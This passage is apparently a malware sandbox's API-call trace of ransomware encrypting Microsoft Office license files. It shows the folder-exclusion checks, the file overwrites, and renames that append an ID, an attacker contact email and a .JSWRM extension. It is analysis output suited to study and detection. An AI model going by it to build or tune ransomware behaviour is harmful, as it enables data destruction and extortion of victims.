Flags=0x0, Size=0xa0) returned 0x23d3e0 [0108.766] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0108.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0108.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.767] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0108.767] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.767] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0108.767] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0108.770] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.770] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0108.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.770] CloseHandle (hObject=0x45c) returned 1 [0108.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0108.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0108.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0108.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0108.770] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0108.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0108.770] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.770] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0108.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0108.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0108.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0108.771] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0108.771] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9f14f18, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9f14f18, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea046217, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a4d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdVL_MAK-ppd.xrm-ms", cAlternateFileName="PR304E~1.XRM")) returned 1 [0108.771] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.772] lstrcmpiW (lpString1="ProjectStdVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0108.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0108.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241268, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0108.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0108.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0108.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2411c8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0108.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0108.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0108.772] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0108.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.772] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0108.772] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.773] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6733) returned 1 [0108.773] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a40) returned 0x205850 [0108.773] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a40, lpOverlapped=0x0) returned 1 [0108.775] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.775] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a40, lpOverlapped=0x0) returned 1 [0108.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0108.775] CloseHandle (hObject=0x45c) returned 1 [0108.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0108.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0108.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.775] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0108.775] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0108.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0108.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0108.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.776] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0108.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0108.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0108.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0108.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0108.777] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9eeec59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9eeec59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9ff9d7f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d51, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdVL_MAK-ul-oob.xrm-ms", cAlternateFileName="PRC652~1.XRM")) returned 1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.777] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0108.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0108.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240fc0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0108.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0108.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0108.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0108.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.778] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11601) returned 1 [0108.778] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0108.778] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0108.780] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.780] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0108.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.780] CloseHandle (hObject=0x45c) returned 1 [0108.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0108.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0108.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0108.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0108.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0108.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0108.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.781] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdvl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0108.782] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ec8a7a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ec8a7a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9fad8cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dea, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdVL_MAK-ul-phn.xrm-ms", cAlternateFileName="PR154D~1.XRM")) returned 1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0108.782] lstrcmpiW (lpString1="ProjectStdVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0108.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0108.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0108.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0108.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdVL_MAK-ul-phn.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241330, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0108.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0108.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0108.782] 